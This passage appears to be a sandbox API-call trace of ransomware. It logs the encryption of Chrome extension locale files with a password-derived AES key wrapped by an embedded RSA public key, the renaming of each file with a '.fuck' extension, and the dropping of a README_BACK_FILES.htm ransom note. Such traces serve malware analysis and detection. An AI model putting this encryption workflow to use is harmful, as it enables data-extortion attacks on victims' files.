lpFindFileData=0x2b9d0e4) returned 1 [0255.205] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.205] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.205] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.205] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.206] GetLastError () returned 0x0 [0255.206] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json")) returned 0x20 [0255.206] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0255.206] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.207] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.208] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.208] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.210] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.210] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.210] CryptHashData (hHash=0x2e18828, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.210] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.211] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.211] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.211] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11898) returned 1 [0255.211] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11898, dwCertEncodingType=0x1, pInfo=0x298fac0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298faf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298faf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18a68) returned 1 [0255.211] CryptEncrypt (in: hKey=0x2e18a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.211] CryptEncrypt (in: hKey=0x2e18a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11458*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11458*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.212] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11458*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11458*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.213] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc6, lpOverlapped=0x0) returned 1 [0255.214] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.214] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.215] CloseHandle (hObject=0x5d5c) returned 1 [0255.215] CloseHandle (hObject=0x5d60) returned 1 [0255.215] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0255.219] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0255.219] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0255.220] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0255.222] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.222] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.222] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.222] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.222] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.222] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0255.222] AreFileApisANSI () returned 1 [0255.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.222] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.223] GetFileType (hFile=0x5d50) returned 0x1 [0255.223] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.225] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.225] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.226] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.226] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.226] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.226] GetLastError () returned 0x0 [0255.226] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json")) returned 0x20 [0255.227] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json", dwFileAttributes=0x80) returned 1 [0255.227] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.228] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.230] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.230] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.233] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.233] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.233] CryptHashData (hHash=0x2e18828, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.233] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.233] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.233] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.233] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11bc8) returned 1 [0255.234] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11bc8, dwCertEncodingType=0x1, pInfo=0x2990d70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990da0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990da8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18f68) returned 1 [0255.234] CryptEncrypt (in: hKey=0x2e18f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.234] CryptEncrypt (in: hKey=0x2e18f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e115f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e115f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.234] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e115f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e115f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.235] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x183, lpOverlapped=0x0) returned 1 [0255.252] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x183, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x190) returned 1 [0255.252] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x190, lpOverlapped=0x0) returned 1 [0255.253] CloseHandle (hObject=0x5d60) returned 1 [0255.253] CloseHandle (hObject=0x5d5c) returned 1 [0255.253] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), bFailIfExists=0) returned 1 [0255.256] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json", dwFileAttributes=0x0) returned 1 [0255.256] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.gsg")) returned 1 [0255.258] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.fuck")) returned 1 [0255.259] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.259] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.259] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.259] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.259] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.259] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\readme_back_files.htm")) returned 0xffffffff [0255.259] AreFileApisANSI () returned 1 [0255.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.260] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.270] GetFileType (hFile=0x5d50) returned 0x1 [0255.270] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.271] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.271] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.271] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.272] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.272] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.272] GetLastError () returned 0x0 [0255.272] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json")) returned 0x20 [0255.272] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json", dwFileAttributes=0x80) returned 1 [0255.273] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.273] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.274] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.274] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.278] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.278] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.278] CryptHashData (hHash=0x2e186a8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.278] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.278] CryptStringToBinaryA (in: 